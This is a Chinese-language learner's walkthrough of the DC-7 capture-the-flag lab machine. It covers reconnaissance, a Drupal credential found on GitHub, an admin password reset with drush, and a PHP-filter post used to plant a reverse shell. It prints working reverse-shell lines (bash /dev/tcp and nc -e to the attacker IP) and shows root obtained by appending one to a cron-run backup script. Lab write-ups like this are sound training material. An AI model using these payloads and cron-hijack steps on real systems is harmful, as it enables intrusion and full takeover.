目录
前期准备
攻击机 : kali windows11
靶机: DC-7(调至NAT模式)
一、渗透测试
1.IP地址查询
┌──(root㉿kali)-[~]
└─# arp-scan -l
通过比对MAC地址,得到靶机的IP地址 192.168.105.167
2.端口地址收集
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.105.167
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-14 19:09 CST
Nmap scan report for 192.168.105.167 (192.168.105.167)
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
发现http服务和ssh服务,且都是打开的
3.网页信息收集
登录80端口
DC - 7 引入了一些 "新" 概念,但我就留给你自己去琢磨它们是什么啦。:-)
虽然这个挑战并非那么具有技术性,但如果你想借助暴力破解或者字典攻击,那你很可能不会成功。
你得做的是跳出常规思维。
要远远地跳出常规思维。:-)
相当于给了一个flag,这里提示暴力破解应该是不行的,并且按一般的思路来的话,估计很难得到账号或者密码
Wappalyzer
看到了熟悉的cms------Drupal 版本为8,在探测的同时用dirsearch扫一下目录。。。除了登录框基本没扫出来啥
到这里真的不知道"新"方法是什么了,就去看了别的师傅的wp,发现是用到了社工信息搜集
社工收集信息
通过这个信息来挖掘用户信息,成功在github中找到了相关信息
此时可以进行代码审计查功能点漏洞或者是直接找隐藏起来的信息,看了一下发现在config.php中,找到了一个用户的信息
账号:dc7user 密码:MdR3xOgB7#dW
???登录不上去?但用SSH可以登录上去(也许该用户被禁用于网页登录了?之后来搞清楚下)
┌──(root㉿kali)-[~]
└─# ssh dc7user@192.168.105.167
The authenticity of host '192.168.105.167 (192.168.105.167)' can't be established.
ED25519 key fingerprint is SHA256:BDWqBUcitB8KKGYDyoeZkt2C/aXhZ7gi5xSEtOSB+Rk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.105.167' (ED25519) to the list of known hosts.
dc7user@192.168.105.167's password:
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
dc7user@dc-7:~$
看仔细,这里显示有一篇新邮件,但可以先看看自己下面的目录
dc7user@dc-7:~$ ls
backups mbox
dc7user@dc-7:~/backups$ ls
website.sql.gpg website.tar.gz.gpg
**GPG(GNU Privacy Guard)**是用于加密、签名和验证数据的工具,GPG 文件通常与 GPG 加密、签名操作相关 。
然后来看看邮件
dc7user@dc-7:~$ mail
"/var/mail/dc7user": 5 messages 5 new
>N 1 Cron Daemon Fri Feb 14 21:19 22/800 Cron <root@dc-7> /opt/sc
N 2 Cron Daemon Fri Feb 14 21:35 21/729 Cron <root@dc-7> /opt/sc
N 3 Cron Daemon Fri Feb 14 21:46 21/729 Cron <root@dc-7> /opt/sc
N 4 Cron Daemon Fri Feb 14 22:01 21/729 Cron <root@dc-7> /opt/sc
N 5 Cron Daemon Fri Feb 14 22:16 21/729 Cron <root@dc-7> /opt/sc
?
这里给了路径,看一下是什么邮件
dc7user@dc-7:~$ cat /var/mail/dc7user
From root@dc-7 Fri Feb 14 21:19:40 2025
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 14 Feb 2025 21:19:40 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1titjM-0000X7-QJ
for root@dc-7; Fri, 14 Feb 2025 21:19:37 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1titjM-0000X7-QJ@dc-7>
Date: Fri, 14 Feb 2025 21:19:36 +1000
rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Fri Feb 14 21:35:06 2025
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 14 Feb 2025 21:35:06 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1tityJ-0002M1-KG
for root@dc-7; Fri, 14 Feb 2025 21:35:03 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1tityJ-0002M1-KG@dc-7>
Date: Fri, 14 Feb 2025 21:35:03 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Fri Feb 14 21:46:11 2025
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 14 Feb 2025 21:46:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1tiu93-0003hz-E7
for root@dc-7; Fri, 14 Feb 2025 21:46:09 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1tiu93-0003hz-E7@dc-7>
Date: Fri, 14 Feb 2025 21:46:09 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Fri Feb 14 22:01:13 2025
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 14 Feb 2025 22:01:13 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1tiuNb-0003ic-NA
for root@dc-7; Fri, 14 Feb 2025 22:01:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1tiuNb-0003ic-NA@dc-7>
Date: Fri, 14 Feb 2025 22:01:11 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Fri Feb 14 22:16:10 2025
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 14 Feb 2025 22:16:10 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1tiuc4-0003jF-Rz
for root@dc-7; Fri, 14 Feb 2025 22:16:08 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1tiuc4-0003jF-Rz@dc-7>
Date: Fri, 14 Feb 2025 22:16:08 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
总结
这些邮件记录了
/opt/scripts/backups.sh脚本的执行情况,该脚本的主要功能是进行数据库备份,备份文件保存到/home/dc7user/backups/website.sql。脚本在执行过程中可能会尝试先清空备份目录,但最初执行时该目录可能不存在。从日志时间来看,该脚本会定期执行,具体的执行周期可以通过查看/etc/crontab或者root用户的crontab文件来确定。
主要是有两个文件
/opt/scripts/backups.sh
/home/dc7user/backups/website.sql
看一下backups.sh文件
dc7user@dc-7:~$ ls -l /opt/scripts/backups.sh
-rwxrwxr-x 1 root www-data 520 Aug 29 2019 /opt/scripts/backups.sh
显示只有root用户以及www-data组的才有写入的权限,其他只有读和执行的权限
dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
You have new mail in /var/mail/dc7user
请AI来帮我们分析一下,其中两条命令我没见过,一个是 drush 一个是 gpg,但是gpg在我们之前已经了解过了,这个 drush是什么意思?
drush是 Drupal 网站的命令行工具,用于管理和操作 Drupal 网站。
这样总结一下信息:backups.sh是可以我们用于提权的,但要利用backups.sh文件(写入shell)
就只能先得到www-data的shell,而要得到www-data的shell的话需要账户登录。。。通过看/home目录下发现没有其他用户了,既然drush是Drupal网站的命令行管理工具,看看有什么命令可以利用,发现一个命令
Drush直接修改账户密码
dc7user@dc-7:~$ drush user-password admin --password="admin"
Command user-password needs a higher bootstrap level to run - you will need to invoke drush from a more functional Drupal environment to [error]
run this command.
The drush command 'user-password admin' could not be executed.
可以用于直接修改admin账号的密码,但这个目录环境不行,一般网页的话是在/var/www/html下
dc7user@dc-7:/var/www/html$ drush user-password admin --password="admin"
Changed password for admin
成功修改密码! 登录网页
现在要在网页中找个shell弹出来,还记得这个页面
这是在登录时就有的,应该是文件包含,如果能在此加入一段反弹shell,然后后续再包含此文件时被服务器解析说不定就能弹shell
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.105.148/5555 0>&1'");
显示只能是HTML来保存,看看有没有解析PHP的插件
下载PHP插件
访问AI给的网站,直接搜搜PHP
点击往下滑
点击下载就可以了,然后下载完后回到靶机web页面,点击插件
再把刚刚下载的文件导入就行了,但我这里导入会显示暂时出错无法导入,看到上面那个URL,直接输入URL应该也行,复制刚刚文件的下载链接
还是显示下载错误。。。只能看看别的师傅的URL了
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
发现这个URL就能成功下载好
再拉到下面勾选一下这个
反弹shell
好,接下来看看能不能解释为PHP,点击编辑我们之前的那个文章
换为PHP code,然后点保存,再次访问网站时,发现还是没能弹shell,再瞅一眼文章
这里显示被转义了,可能是前面的无关内容太多了?只添加这句
此时就发现成功反弹shell了
┌──(root㉿kali)-[~]
└─# nc -lvp 5555
listening on [any] 5555 ...
connect to [192.168.105.148] from 192.168.105.167 [192.168.105.167] 42202
bash: cannot set terminal process group (556): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-7:/var/www/html$
好的,回想一下之前我们的操作,我们需要root或者www-data来执行backups.sh来进行提权,因为从前面的邮件可以看出,root会定时执行backups.sh,那就让backups.sh包含反弹shell,到时间就会自动获得root的权限
www-data@dc-7:/opt/scripts$ echo "nc -e /bin/bash/ 192.168.105.148 5556" >>backups.sh
然后此时等待就可以得到root的shell了,但我的shell只能持续很短一段时间,不知道什么原因
二、总结
本次的靶机学习让我接触到了很多"不一样"的思路,回想一下,包括:**社工信息搜集、一些网站配备的命令行工具的了解、通过下载插件来满足自己的需求,**这些思路对我来说都是蛮新的,也参考了很多师傅的wp(因为实在是不会--_--|),没有解决问题的头绪。我在打靶机的时候,可能并不会去注意Drush命令工具(虽然会让AI给我解释,但是并不会想到要去利用它),然后关于插件,一开始登录进去之后,我第一个想的就是找个插件漏洞,但发现没有插件。。。说到底就是不情愿去看找网页一些可能出现漏洞的功能点,其实说起来,该网站"表面上"是不会出现什么漏洞的,而是想到"如果这个写入的功能能被解释为PHP就好了"才能够利用起来。希望我以后能够戒骄戒躁吧
